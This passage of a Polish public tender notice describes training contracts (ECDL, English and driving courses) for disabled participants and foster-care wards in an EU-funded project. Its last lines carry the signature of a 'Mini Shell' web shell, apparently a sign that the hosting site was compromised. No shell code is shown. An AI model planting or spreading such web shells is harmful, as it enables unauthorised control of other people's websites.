wykonywanie raportów, wykonywanie zestawień, eksport danych do Płatnika); praca przy ryczałcie ewidencjonowanym; praca w podatkowej księdze przychodów i rozchodów.
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.) zgodnie z obowiązującymi przepisami.
Liczba uczestników: 1 osoba niepełnosprawna, 1 rodzic dziecka niepełnosprawnego
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE NR 10 - Zorganizowanie i przeprowadzenie Kursu ECDL dla uczestników projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie słuchaczy do egzaminu na Europejski Certyfikat Umiejętności Komputerowych. Uczestnicy zajęć zapoznani zostaną z możliwościami wykorzystania technologii informacji i komunikacji w uczeniu się i działalności zawodowej oraz kształtowanie podstawowych umiejętności wykorzystania programów użytkowych. Podczas kursu kształtowane są także umiejętności posługiwania się lokalnymi i rozległymi sieciami komputerowymi, zwłaszcza w zakresie pozyskiwania i gromadzenia danych. Uczestnicy kursu nie będący uczniami lub studentami powinni mieć co najmniej wykształcenie średnie.
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.) zgodnie z obowiązującymi przepisami.
Liczba uczestników: 6 osób niepełnosprawych, 2 wychowanków rodzinnej pieczy zastępczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE NR 11 - Zorganizowanie i przeprowadzenie Kursu języka angielskiego dla  średnio zaawansowanych dla uczestnika projektu Aktywni Mogą Więcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie weźmie udział 1 osoba związana z zastępczą formą wychowania.
Uczestniczka kursu musi być objęta ubezpieczeniem od następstw nieszczęśliwych wypadków na czas trwania zajęć. Wykonawca powinien zapewnić materiały, podręczniki, przybory itp., które wykorzystane zostaną do wyposażenia uczestniczki w wiedzę i umiejętności w zakresie prowadzonego kursu (jeden egzemplarz materiałów szkoleniowych winien zostać przekazany Zlecającemu). Po zakończeniu kursu uczestniczka otrzyma zaświadczenia odbycia kursu języka niemieckiego na poziomie średniozaawansowanym - certyfikat z widniejącymi logotypami EFS POKL. 
Liczba godzin: co najmniej  40 godzin  (jedna godzina zajęć winna trwać 45 min.) zgodnie z obowiązującymi przepisami.
Liczba uczestników: 1 wychowanek rodzinnej pieczy zastępcze
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE NR 12 - Zorganizowanie i przeprowadzenie Kursu prawa jazdy kat. B dla 1 osoby (wychowanek rodzinnej pieczy zastępczej)- uczestnika projektu Aktywni Mogą Więcej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obejmuje przygotowanie teoretyczne i praktyczne do egzaminu państwowego z przeprowadzeniem egzaminu wewnętrznego sprawdzającego stopień opanowania materiału oraz wydanie dokumentu zgodnie z obowiązującymi przepisami uprawniającego do przystąpienia do egzaminu państwowego wraz z ustaleniem egzaminu państwowego w określonym terminie z wniesieniem należnej opłaty za pierwszy egzamin państwowy w części teoretycznej i praktycznej. 
Wymiar godzin dla uczestnika kursu - 60 godz. w tym:
-30 godzin zajęć teoretycznych (1 godz.=45 min)
-30 godzin zajęć praktycznych (1 godz.= 60 min)
Uczestnicy: 1 osoba (wychowanek rodzinnej pieczy zastępczej)
Termin realizacji kursu: sierpień - październik 2014 r. 
Pozostałe informacje w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com